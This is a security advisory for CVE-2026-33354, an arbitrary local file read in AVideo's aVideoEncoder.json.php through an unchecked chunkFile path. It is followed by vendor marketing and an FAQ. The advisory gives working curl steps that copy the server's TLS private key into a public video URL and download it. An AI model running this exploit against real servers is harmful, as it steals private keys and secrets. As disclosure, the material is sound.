Summary
POST /objects/aVideoEncoder.json.php accepts a requester-controlled chunkFile parameter intended for staged upload chunks. Instead of restricting that path to trusted server-generated chunk locations, the endpoint accepts arbitrary local filesystem paths that pass isValidURLOrPath(). That helper allows files under broad server directories including /var/www/, the application root, cache, tmp, and videos, only rejecting .php files.
For an authenticated uploader editing their own video, this becomes an arbitrary local file read. The endpoint copies the attacker-chosen local file into the attacker's public video storage path, after which it can be downloaded over HTTP.
I confirmed this locally by creating an attacker-owned video, then calling aVideoEncoder.json.php with videos_id=<own video>, format=mp4, and chunkFile=/var/www/html/AVideo/.compose/letsencrypt/live/localhost/privkey.pem. The resulting public video URL returned the local TLS private key and began with -----BEGIN PRIVATE KEY-----.
Affected Versions / Commit
Tested on local Docker deployment from commit db12d4c0141d40bfabd1e82577e8c4a3d044cd84. The application reported version 26.0.
Preconditions
- Authenticated account with upload permission.
- Attacker owns at least one editable video record.
- Target local file is readable by the web application user.
Steps to Reproduce
- Log in as an upload-capable low-privileged user.
- Create any attacker-owned video via the normal upload endpoint to obtain
videos_idandfilename. - Send a POST request to
aVideoEncoder.json.phpwith the attacker's ownvideos_id, an allowedformat, and a server-localchunkFilepath. - Download the resulting media object from
/videos/<filename>/<filename>.mp4.
Proof of Concept
The included poc.py automates the exploit against the local instance.
Manual reproduction:
# 1. Login as low-priv uploader
curl -s -c attacker.cookies \
-d 'user=attacker&pass=UserPass123!' \
http://127.0.0.1/objects/login.json.php >/dev/null
# 2. Create an attacker-owned video
printf 'x' > poc.mp4
curl -s -b attacker.cookies \
-F '[email protected];type=video/mp4' \
http://127.0.0.1/view/mini-upload-form/upload.php
# Example response:
# {"error":false,"title":"poc","filename":"poc_69bb86db62c308.68438735","videos_id":4,...}
# 3. Copy a local file into the attacker's public video path
curl -s -b attacker.cookies \
-d 'videos_id=4&format=mp4&title=poc&description=test&chunkFile=/var/www/html/AVideo/.compose/letsencrypt/live/localhost/privkey.pem' \
http://127.0.0.1/objects/aVideoEncoder.json.php
# 4. Retrieve the copied file over HTTP
curl -s \
http://127.0.0.1/videos/poc_69bb86db62c308.68438735/poc_69bb86db62c308.68438735.mp4 | head
Observed Result
The final GET returned the contents of the local TLS private key:
-----BEGIN PRIVATE KEY-----
MIIJQgIBADANBgkqhkiG9w0BAQEFAASCCSwwggkoAgEAAoICAQ...
Impact
CVE-2026-33354 has a CVSS score of 7.6 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33354? CVE-2026-33354 is a high-severity security vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet.
- How severe is CVE-2026-33354? CVE-2026-33354 has a CVSS score of 7.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of wwbn/avideo are affected by CVE-2026-33354? wwbn/avideo (composer) versions <= 26.0 is affected.
- Is there a fix for CVE-2026-33354? No fixed version is listed for CVE-2026-33354 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-33354 exploitable, and should I be worried? Whether CVE-2026-33354 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33354 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.